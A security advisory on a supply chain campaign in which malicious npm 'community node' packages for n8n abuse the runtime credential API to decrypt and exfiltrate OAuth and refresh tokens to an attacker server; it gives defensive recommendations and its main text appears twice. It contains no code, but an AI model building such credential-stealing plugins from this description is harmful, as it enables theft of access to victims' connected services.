n8mare on Auth Street: Supply Chain Attack Targets n8n Ecosystem
Summary:
Threat actors are actively conducting a software supply chain attack targeting the n8n workflow automation ecosystem via malicious npm packages. These packages masquerade as legitimate "community nodes" which n8n automatically recognizes as a new node (specifically for Google Ads integrations) to deceive users into installing them on their n8n instances. Once installed, the malicious nodes function as intended to capture user configurations but covertly exfiltrate high-value sensitive credentials, including OAuth tokens, Client IDs, and Refresh Tokens, to an attacker-controlled C2 server. Compromise of these tokens allows attackers persistent, third-party access to the victim's connected SaaS ecosystems. While n8n encrypts these credentials at rest, the malicious code exploits n8n's runtime environment. During the "Execute Workflow" phase, the node invokes standard n8n APIs (this.getCredentials) to decrypt the stored credentials. Because n8n acts as a central automation hub, it often holds privileged access (OAuth scopes, API keys) to critical business services like Google, Salesforce, and Stripe. Compromise of these tokens allows attackers persistent, third-party access to the victim's connected SaaS ecosystems.
Security Officer Comments:
This campaign represents a significant tactical evolution in supply chain attacks, moving beyond the compromise of developer workstations to target Workflow Automation Platforms (WAPs). Platforms like n8n, Zapier, or Make serve as centralized vaults for secrets, aggregating high-privilege credentials for dozens of services in a single location. The attack exploits the implicit trust users place in "community" extensions. The community nodes operate with the same privileges as core nodes, and there is essentially no sandboxing between third-party code and the core runtime, making this implicit trust paramount to the attack’s effectiveness. The attackers gain long-term persistent access to victim environments by targeting refresh tokens.
Organizations utilizing n8n should immediately audit installed community nodes against the published IOC list. Restrict n8n instances to a strict allow-list of official nodes where possible and monitor outbound traffic for unexpected POST requests to unrelated cloud hosting subdomains. Because the stolen tokens are legitimate, rotating all credentials stored in any affected n8n instance is necessary to sever attacker access.
Suggested Corrections:
IOCs: https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem
Users should follow these practices to reduce the risk of n8n supply chain attacks:
https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem
Threat actors are actively conducting a software supply chain attack targeting the n8n workflow automation ecosystem via malicious npm packages. These packages masquerade as legitimate "community nodes" which n8n automatically recognizes as a new node (specifically for Google Ads integrations) to deceive users into installing them on their n8n instances. Once installed, the malicious nodes function as intended to capture user configurations but covertly exfiltrate high-value sensitive credentials, including OAuth tokens, Client IDs, and Refresh Tokens, to an attacker-controlled C2 server. Compromise of these tokens allows attackers persistent, third-party access to the victim's connected SaaS ecosystems. While n8n encrypts these credentials at rest, the malicious code exploits n8n's runtime environment. During the "Execute Workflow" phase, the node invokes standard n8n APIs (this.getCredentials) to decrypt the stored credentials. Because n8n acts as a central automation hub, it often holds privileged access (OAuth scopes, API keys) to critical business services like Google, Salesforce, and Stripe. Compromise of these tokens allows attackers persistent, third-party access to the victim's connected SaaS ecosystems.
Security Officer Comments:
This campaign represents a significant tactical evolution in supply chain attacks, moving beyond the compromise of developer workstations to target Workflow Automation Platforms (WAPs). Platforms like n8n, Zapier, or Make serve as centralized vaults for secrets, aggregating high-privilege credentials for dozens of services in a single location. The attack exploits the implicit trust users place in "community" extensions. The community nodes operate with the same privileges as core nodes, and there is essentially no sandboxing between third-party code and the core runtime, making this implicit trust paramount to the attack’s effectiveness. The attackers gain long-term persistent access to victim environments by targeting refresh tokens.
Organizations utilizing n8n should immediately audit installed community nodes against the published IOC list. Restrict n8n instances to a strict allow-list of official nodes where possible and monitor outbound traffic for unexpected POST requests to unrelated cloud hosting subdomains. Because the stolen tokens are legitimate, rotating all credentials stored in any affected n8n instance is necessary to sever attacker access.
Suggested Corrections:
IOCs: https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem
Users should follow these practices to reduce the risk of n8n supply chain attacks:
- Use official nodes, prefer n8n's built-in integrations
- Audit packages before installing them by reviewing source code on npm or GitHub
- Scrutinize package metadata for red flags such as empty descriptions, random names, low download counts, or missing documentation, and prefer official n8n integrations whenever possible.
- Monitor outbound network traffic from n8n instances can help detect suspicious activity
- Use isolated service accounts with the least privileges required to minimize credential risk.
https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem